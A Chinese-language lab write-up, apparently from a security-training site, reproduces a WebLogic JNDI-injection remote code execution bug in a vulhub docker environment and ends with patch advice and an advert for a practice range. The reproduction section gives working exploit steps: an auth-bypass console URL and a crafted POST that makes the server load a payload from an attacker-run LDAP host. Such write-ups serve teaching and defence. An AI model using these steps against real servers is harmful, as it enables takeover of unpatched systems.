简介
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
漏洞概述
该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。
影响版本
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
环境搭建
1. 本次漏洞环境使用vulhub中的docker搭建,下载地址
https://github.com/vulhub/vulhub
2. 然后使用vulhub中CVE-2020-14882漏洞为本次漏洞复现环境
cd vulhub-master/weblogic/CVE-2020-14882/
docker-compose up -d
4.在浏览器访问http://your-ip:7001/console,出现以下页面搭建成功
漏洞复现
1.下载LDAP,并启动LDAP,下载地址:
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
注:运行ldap需要java1.8环境
java -jar JNDIExploit-v1.11.jar -i 172.16.1.147
3. 使用未授权漏洞配合利用,在首页url处输入以下链接,并进行抓包并发送到重放模块
/console/css/%252e%252e%252f/consolejndi.portal
4. 将get改为post,并构造以下数据包。注:172.16.1;147有个点为分号
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.1;147:1389/Basic/WeblogicEcho;AdminServer%22)
修复建议
1、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本
2、更新最新补丁,参考Oracle官网发布的补丁:
https://www.oracle.com/security-alerts/cpujan2021.html
参考链接
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
在这里,给大家介绍一下“东塔攻防世界靶场”
2020年12月,东塔攻防世界靶场正式对外提供注册,各位小伙伴可通过注册后进行体验。新注册用户可获得一定的积分,对于靶场使用获取正确的Key后,也可以获取一定的经验值,经验值根据排名会不定期给予一定的奖励。
并且,在操作过程中,针对出现的Bug和安全漏洞问题可以和塔塔子提出,审核通过后可以获得相应的奖励积分。
东塔攻防世界网站不定时推出可免费限时使用的靶场,具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服了解详情。
东塔攻防世界靶场主要分为在线靶场和职业体系两大特色板块。且平台内的靶场会定期更新内容,尤其是最新漏洞复现的一些文章和靶场,会优先在靶场中提供环境让大家体验。
东塔攻防世界网站会不定期限时免费推出最新的一些复现的靶场,以供学习交流,给了大家充分体验和使用靶场的机会。
具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服wx(dongtakefu)了解详情。
除了以上介绍的内容,还有更多宝藏区域,更强大的功能,等你来寻宝!
详戳下方“东塔攻防世界靶场”网址,Get一波新世界
https://labs.do-ta.com
来源:freebuf.com 2021-02-02 18:11:12 by: 东塔安全学院
请登录后发表评论
注册